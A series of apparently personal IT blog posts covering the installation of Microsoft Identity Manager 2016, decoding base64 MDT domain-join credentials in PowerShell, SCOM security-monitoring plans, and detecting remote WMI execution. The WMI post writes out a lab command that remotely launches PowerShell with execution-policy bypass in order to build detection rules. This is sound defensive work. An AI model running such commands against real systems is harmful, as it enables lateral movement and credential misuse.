Installing Microsoft Identity Manager 2016–Part 2

We addressed the pre-requisites here.  As you can see, there was quite a bit to accomplish to even start working on MIM. Now for the good stuff. There’s essentially two components in play for the bulk of the installs. You have the Synchronization service as well as the portal which covers the bulk of the MIM install. It’s worth noting that plenty of mistakes can be made here, so think and plan this one out carefully.

To start, I’m going to make a couple notes:

1) Log on as the MIMInstall account. I mentioned this before, but there does seem to be some ties into the account that installs it. I recommend a generic install account here that is an admin on the server in question. You can disable it later on once you’ve granted all the appropriate rights and what not and simple re-enable as needed.

2) Once you have the CD/ISO mounted, create a temp folder somewhere for logging information. You may need it. Launch an elevated command prompt and run the following from the synchronization service folder in the CD (I’m using c:\temp for my temp folder):

msiexec /i “Synchronization service.msi” /L*v c:\temp\MIM_SyncService_Install.log

That will create a log file in the c:\temp folder, which can be useful if you need to troubleshoot.

Click Next through the first wizard and accept the license agreement and click next again.

This screen as well is pretty straight forward, click next:

image

Here’s where you have hopefully made a choice, I’m hosting my SQL server locally, but if you aren’t, you need to change this.

image

The next screen wants the creds to your MIM Service Account. This is also pretty easy.

image

Next are the various groups you created previously (by the way, if you haven’t already done this, add the appropriate people to the Admins group):

image

You probably want to open firewall ports. If you aren’t using Windows Firewall, you’ll want to do this manually:

image

At this point, you can click Install. I’ll save you the boring screenshot, and the install shouldn’t take too long. That said, you’ll want to launch the Synchronization service once done. If it doesn’t start, you have a problem. Go back and figure this out, because trust me, if this isn’t working right, it makes the portal portion even harder. When it’s working, you should see this screen when you launch it without error:

image

If you have don’t this already, you might want to get around to those aliases I mentioned in the first piece. You’re going to install the portal next, which sits on top of the SharePoint site collection you setup previously.  You can still work off of the CD you mounted earlier, but you’ll need to navigate to the service and portal folder and run the following command: 

msiexec /i “Service and Portal.msi” /L*v c:\temp\MIM_Service_Install.log

It’s the same concept. You’re putting a log in c:\temp so you can troubleshoot what’s going on here. Like before, you can click next through welcome and accept the licensing agreement. You can decide at this point if you want to use PAM. I chose no here, as this is a lab. It is, however, something that’s highly encouraged as it enables just in time administration.

image

Next, you identify a database server and database name:

image

If you have Exchange running locally or online, do something here. I don’t at this point, so I’m going to uncheck the top two boxes and set this to localhost:

image

In a prod environment, I’d have a CA doing a real certificate, for what that’s worth. Here, I’ll use a self-signed:

image

Next, you define that service account. Note the warning here about that email. It’s kind of important.

image

Depending on how you configured it, you may receive a warning about the account being insecure. Go back to the guide and figure that part out. Ensure you did it right. Next you need the Management Agent Account. The server name here is the server where the synchronization service was previously installed. I kept these all on the same machine, but I’m also running this in lab with one user.

image

Side note, but if you get this warning, cancel the install and revisit issues with the Synchronization service:

image

If you don’t, you’ll move on to this screen. Enter the server name hosting the SharePoint Site Collection:

image

And then enter the site collection URL you created earlier:

image

Now you’ll be prompted for the password registration portal URL… note that this does need to have the http, it’s cut off in my screenshot. And for some silly reason, MSFT has * in front of the URL in their example. Don’t do that. I tried it for fun. It doesn’t work.

image

Now for ports, like before, open them if you have the Windows firewall on. If not, call your Firewall person and have him/her do it:

image

And you thought we were done Smile. Not even close. One more service account, this time your sspr which I’d add will be done again shortly. Also, You need the password registration URL (without the HTTP this time) and you might want to open ports. Note that I’m doing this on 80 because I don’t have a CA. But if you do, you should issue a web cert here and use 443.

image

If you use 80, you’ll get a security warning. Otherwise, you need to enter the servername hosting the MIM Service.I did choose to keep this internal, but you may want this on an extranet. Choose accordingly:

image

And for grins, you get to put your SSPR in again, this time referencing the password reset portal:

image

If you’re not secure here (i.e. no https), you’ll get another warning. Go back and setup https. But if not, click next. That brings you to this screen, much like the above. This time though, you need to configure the password reset URL to go with the server hosting the MIM Service installed above:

image

Now you’re done (sort of). Click Install. If you have no errors, you can go on to the next part.

Installing Microsoft Identity Manager 2016–Part 1

I’m moving off the SCOM world a bit as I’ve been tasked with learning a new product. My cyber mentor told me that this is one that I’ll find myself redoing multiple times and unfortunately, he wasn’t kidding. I did some looking around and didn’t find much in terms of good step by steps on this, so I decided to create my own. For the most part, I’m working off of the documentation found here, but there are some gaps in it along with a few lessons learned that aren’t clearly documented. Hopefully, someone will find this useful.

First, let’s talk about what it is.

It’s main purpose is to synchronize your corporate identities off of a master copy. Let’s say for instance, that your authoritative identity store is an HR database. MIM can be used to take the data entered in the HR database and push it to Active Directory, Exchange, a 3rd party ticketing tool, and well, just about anything if you take the time to install the connectors and (if necessary) write the scripts. It’s pretty powerful and automates a lot of manual processes that are often filled with user error. It can also used to synchronize identities between your on premise infrastructure and your Azure infrastructure.  Likewise, it comes with really cool features such as the ability to enable self service password resets via a registration and reset portal. This allows users to quickly reset their own passwords instead of waiting on hold for a help desk representative to do it for them. It’s quicker and it takes a load off of your call center since password resets are one of the higher volume calls. As a security person, I think there are better solutions to passwords in general (Microsoft is going 2 factor and password free for the record), and I think that’s an attainable goal, but organizations aren’t often changing that fast, and something like MIM can help them transition to that.

If you want to read more, this is a good starting point. This is basically the next evolution of ForeFront Identity Manager (FIM), so you’ll see a lot of these terms used interchangeably.

Pre-Requisites

Ok, so I’m done with the sales pitch. Sorry about all of that. I’m guessing if you’re reading this, you’re already interested in it. From a pre-requisite standpoint, the product is somewhat complicated. You need active directory, which to be fair everyone has. The web portals sit on top of a SharePoint infrastructure, and of course there’s a SQL database involved as well. So lots of setup. We break our documentation into the domain setup, server setup, Exchange, SharePoint, and SQL setup. I’m not going to step by step all of these, but I am going to highlight the basic needs.  First of note, I don’t have Exchange in my lab presently, so I’m not doing that at all.

  • First step, figure out your URLs. For my demo purposes, I’m using mim.ctm.contoso.com as the main portal. I’m using passwordregistration.ctm.contoso.com and passwordreset.ctm.contoso.com for registering and resetting passwords. I’m going to house all of that one one SharePoint Front end server, which also double as my MIM server. You can distribute which is highly recommended for a non-lab environment, but for the purposes of my lab, SQL, SharePoint, and MIM will all be housed on the same server. Since this is web based, https is highly recommended. I don’t have the certificate infrastructure to do that, so I’m going to stick with http in my lab, but I think the average reader understands that this is not ideally a good answer. You can however, start with http and change it to https later on since this is all using IIS and SharePoint. I do highly recommend that you involve your SharePoint admin for this stage of planning so they can carve off the site collection and what not.
  • Second step, figure out your accounts. I would note that the scripts here are for the most part good. There is, however, a typo in the account creation scripts with both the MIMInstall account and the MIMMA account having MIMMA as the name. You’ll want to correct that if you’re just going to use our scripts. It’s wroth noting that our scripts assume a different URL than what I’m using, so you’ll probably want to drop these into an ISE window and edit them to fit your needs, and you’ll probably not want to use the same password for all of these accounts either. It’s also worth noting that this is heavily dependent on Kerberos, and as such you’ll need to setup those SPNs. Your SQL and SharePoint admins may have different means of configuring all of this. If for instance, you aren’t using a SQL service account to manage SQL, than the SPN information will need to be tied to the SQL server machine name and what not. This one will cost you time troubleshooting if you’re not careful about it, so pay attention to all of that.
  • Third step, install SQL server. I’m not a fan of the instructions found here. It’s a simple script. There’s nothing wrong with that, but it really doesn’t tell you much. You need the database engine obviously. You need SQL agent set to auto start. You also need Full Text Search installed.  The MIM install will fail if you don’t do that.  Your MIM Install account will need to be an SA over the instance. Our script assumes that the account you used in step 2 is being used as the SQL server service account. Don’t forget that though if you install using the wizard, as there are Kerberos settings tied to it.
  • Fourth step, install SharePoint. These scripts all work, but you’ll need to modify the URLs to suit your needs.
  • Fifth step, Exchange. I don’t have anything to add here because I didn’t do it. You’re on your own here.
  • Sixth step, MIM server setup. The server setup documentation is relatively straight forward. Your MIMInstall account will need to be a local admin, and as the guide notes, your service accounts need the logon as a service right. You may need to set this part via GPO depending on your environment, and of course the SQL and SharePoint accounts will need that too, but if you’re been working with your SharePoint admin and SQL DBA, that’s been addressed. The server install piece is straight forward, but the scripts were written for older versions of windows, so they won’t work on a Server 2016 deployment (there is no application server role anymore). I’ve modified it slightly:

import-module ServerManager
Install-WindowsFeature Web-WebServer,Net-Framework-Features,rsat-ad-powershell,Web-Mgmt-Tools,Windows-Identity-Foundation,Server-Media-Foundation,Xps-Viewer –includeallsubfeature -restart -source d:\sources\SxS

Note also the source location, as not all of these are on a standard server build, especially if you’re deploying in the cloud.

Anyways, that’s it for the setup. Next step will cover the sync service as well as the portal installs.

Referencing Username and Password Credentials in an MDT Task Sequence

I don’t usually write about MDT, and I do not plan on making this a habit either. However, I ran into an issue doing some automation for a customer that I felt needed documentation. This is just as much for my own benefit as it is the for the 3 people who may find this useful, but there wasn’t much written about this online. Whenever I find myself in this situation, I usually turn it into a blog if the solution is not something that’s naturally intuitive.

First, to back up a bit. Microsoft Deployment Toolkit (MDT) is a free method of creating light and zero touch deployments for Operating System images across physical and/or virtual platforms. It’s generally installed as a sub-component to SCCM (which is not free). SCCM can provide more automation for those types of tasks and gets you around the problem that I’m describing here, but MDT can exist in a standalone environment especially if System Center is too expensive to purchase. Even at MSFT we do have use for MDT in certain types of engagements as it can be used to automate some of our own solutions that we bring into a customer environment without needing to setup a System Center infrastructure.

In this particular case, we needed to make use of some of the variables in the MDT scripting environment. It’s worth noting that there are a ton of variables available to use. A full list of what is available for you to use can be found in the variables.dat file that exists locally on the machine being built. This file is generated during deployment and is then removed once deployment is complete. I’m sure there’s a place on the MDT server which houses this, but I never got that far as this file was not removed when my task sequence was failing. The long and short is that you can edit this file with notepad and see all of the variables available for you to use in a scripting environment.

From a scripting standpoint, these variables can be referenced within the script being executed in your task sequence, allowing you some very powerful automation options. The problem, as we discovered is that some variables are not represented in clear text. As you can guess, this is typically username and password data. Both of these are in the variables.dat file, but not in readable form as they are store in base64 format. To be abundantly clear, nothing about this is secure. It’s meant only to prevent prying eyes from seeing usernames and passwords in clear text. Converting from base64 to ASCII is a single line of PowerShell, so whatever credentials you choose to put in MDT need to have only the permissions needed to do what task you need it to do. As well, physical access to your build environment is also paramount. Keep that in mind as well.

To start, we need to load the TS environment. This is easy to do and not hard to find online:

$tsenv = New-Object -ComObject Microsoft.SMS.TSEnvironment

At this point, we need to reference the variable. In my case, I’m going to use the domain join account that someone specifies during the installation wizard. You do this as such:

$Username = $Global:TSEnv.Value(“OSDJOINACCOUNT”)
$Password = $Global:TSEnv.Value(“OSDJOINPASSWORD”)

$Domain = $Global:TSEnv.Value(“DOMAINNAME”)

Again, that’s pretty easy. The $Domain value is in clear text, so there’s not much too this, but if you were to pull the OSDJOINACCOUNT and OSDJOINPASSWORD variables out of the variables.dat file, you’ll see something non-readable. The hard work in my case was figuring out what this format was. My assumption was that it was probably hashed like we do a typical password. That wasn’t the case and it took a lot of digging around to find an offhand comment on reddit that these were actually base64.  For a PowerShell professional, this is pretty easy, but for those of us who don’t breathe ISE, this is a bit more difficult. From there, you need this step:

$Password2 = [System.text.encoding]::ASCII.GetString([system.convert]::fromBase64String($Password))
$Username2 = [System.text.encoding]::ASCII.GetString([system.convert]::fromBase64String($Username))

Now we have the Username and Password in a format that a Task Sequence can use. The rest is pretty standard. I’m converting the password to a secure string and creating a credential object in PowerShell that can use it.

$CredPass = ConvertTo-SecureString $Password2 -AsPlainText -Force


$Credential = New-Object System.Management.Automation.PSCredential($Username2,$CredPass)

At this point, you have a credential that works, and whatever PowerShell command you’re trying to script that uses said credential can be given the $Credential variable.

That’s it.

Don’t ask me how to do it in VBS. I have no plans on learning that. 

Security Monitoring Future Plans (May 2019)

The good news about this project is that we’ve been able to knock out a lot of low hanging fruit that can be used to detect some of the bread crumbs that an attacker leaves behind as well as identifying where legacy protocols are being used. The bad news is that most of the low hanging fruit has been picked clean. This space will be used to help identify and track future plans.

I’m going to stick with a 1 year cadence. This has been developed mostly by me on my own time, and as such there’s only so many hours to go around. My current plans are as follows:

  • I would like to develop an administrative account monitoring component targeting admin accounts. I’m not sure how easily this will be able to be accomplished. Enumerating these against a DC is not that hard to do, but in order to alert on these, these objects would need to be created on each and every DC. This isn’t realistic from a performance standpoint. There’s currently an unhosted class and disabled discovery in this MP, but nothing is targeted against it. The hope would be to come up with a way to start tracking admin accounts in general, logons outside of business hours, etc.
  • I’m hoping to delve more into WMI monitoring with the next release.
  • There are a few rules that I could see re-writing to add overridable parameters.
  • Likely going to write some detection mechanisms around this SCOM vulnerability.

This is not a big list presently, but as time permits I hope to grow it. Any suggestions are always appreciated.

Security Monitoring Change Log May 2019

  • Updated Task Scheduler Creation Rule
  • Updated Service Creation on DC Rule
  • Disabled alert rule for Batch Logon. There is a report that is capturing this. The rule is still present and can be enabled.
  • Created override for Local Account Creation rules for domain controllers. While this didn’t appear in any testing, I was told that some security software can generate false positives for this one on domain controllers. Since DCs don’t have local accounts to begin with, I simply turned this off for domain controllers.
  • Fixed a bug with regsvr32 remote registration of DLL rule.
  • Added rules/discoveries associated with writeable locations in the OS. Note that there are three parts to this series.
  • Added rule to detect attempt to kill windows defender.
  • Added collection rule and report for TLS usage.
  • Added rules for suspicious PowerShell Usage.  For instructions on overrides, please see the addendum.
  • Removed dependency on SQL MP.
  • Added rule for WMI Persistence.
  • Added rules for WMI Remoting.
  • Distributed application
  • Added a timeout as an overridable parameter to the SMB1 collection rule. The specified timeout of 60 seconds was causing failures in my lab. I upped this value to 300 seconds as the default setting.
  • Turned off registry monitor for WDigest settings. This was not needed in Server 2012/2016. With Server 2008 going out of support, I’ve disabled the monitor. It is still present if someone desires to use it. 

Security Monitoring: Using SCOM to Detect Remote WMI Attempts

Last week, I wrote about a WMI persistence attempt, where an attacker can use the WMI scheduler to effectively hide a scheduled task within WMI. Today, I’m going to talk about another use of WMI that was in Matt Graeber’s paper: remoting. This is another thing that I suppose will happen from time to time in an environment, but I’m guessing it’s fairly rare given the plethora of remote administration tools out there.

I started by borrowing the PowerShell code needed to accomplish this. As you can see, the code isn’t that difficult to write:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList ‘powershell.exe -noexit -ExecutionPolicy Bypass -File \\scom1\new_share\badps.ps1’ -ComputerName SQL1 -Credential ‘nagau\nagau’

I essentially created a share on my SCOM server to execute a PowerShell script remotely on my SQL server using my credentials. A bad guy can do this too, though I’m also going to assume that they are using something a bit sophisticated to do this and would be passing the hash of a stolen account into this in some capacity. I’m not too worried about that at the moment, I’m more concerned with seeing what can be safely detected. The WMI logs were unfortunately useless. However, there were some interesting events in the security logs on both of the servers in question.  On my source server, the following event was captured:

image

This is a standard logon/logoff event, and you’ll see this pretty much every time something logs on to your system. On it’s own, that’s going to be a noisy event, but often times with this kind of stuff, the devil can be in the details, and I think the highlighted information may have some clues that there’s something on that shouldn’t be.  For one, this isn’t a standard RUNAS command, as the event ID implies. I tested this on the same system, but doing a local RUNAS will have the account name you used listed, but it will also have a target of localhost. The additional information will also say local host. The process name is also somewhat telling here, being svchost. While it’s not unusual to see svchost in a process, this event is telling us that svchost is making a remote procedure call. It’s probably worth noting that there was another 4648 on the same machine that told a bit more info about what I was doing, but I’m not sure it has anything useful that I could alert off of.

image

We can see from that event that I’m also targeting a remote server and that I’m using PowerShell_ISE to run the command, but ultimately an attacker is will be using their own tools, and if I knew the name of said process, I could just target that.  This particular event might be something worth searching for if the top event appears.

On the remote host, I also saw another telling event, in this case it was our 4688 that we routinely target:

image

If you look closely, you’ll notice that my PowerShell bypassed my execution policy. That alert fired as expected, so I won’t target that here. But the highlighted fields were also pretty unique for a typical 4688. You can see that WMI kicked off a PowerShell process, but under the context of the Network Service Account instead of the System account like one would typically see. The security ID also uses the NULL SID, which seems to differ from other Network Service account usages that created 4688 events. As such, I’m going to try out two new rules to see just how unique these guys are:

Rule 1 will target the security log looking for our 4648 with parameter 10 containing RPCSS, parameter 9 not containing the computer name, and parameter 12 containing SVC Host

Rule 2 will target the security log looking for a 4688 event with parameter 1 containing Network, parameter 10 containing NULL, and parameter 14 containing WmiPrvSe.exe

Note: For this to work properly, the process command line GPO MUST be set, otherwise, it will screw up the parameters.

I’ll let these bake and see if they make noise. Happy SCOMing.

Update 3/19 – SCOM can actually trigger one of these rules. It’s not surprising on investigation as SCOM will periodically have to restart the health service when it takes up too much CPU/RAM. Since my DC is chronically under-speced, I’m not surprised to find  SCOM doing this. Anyways, I’ve updated this rule to exclude SCOM’s remote WMI attempt.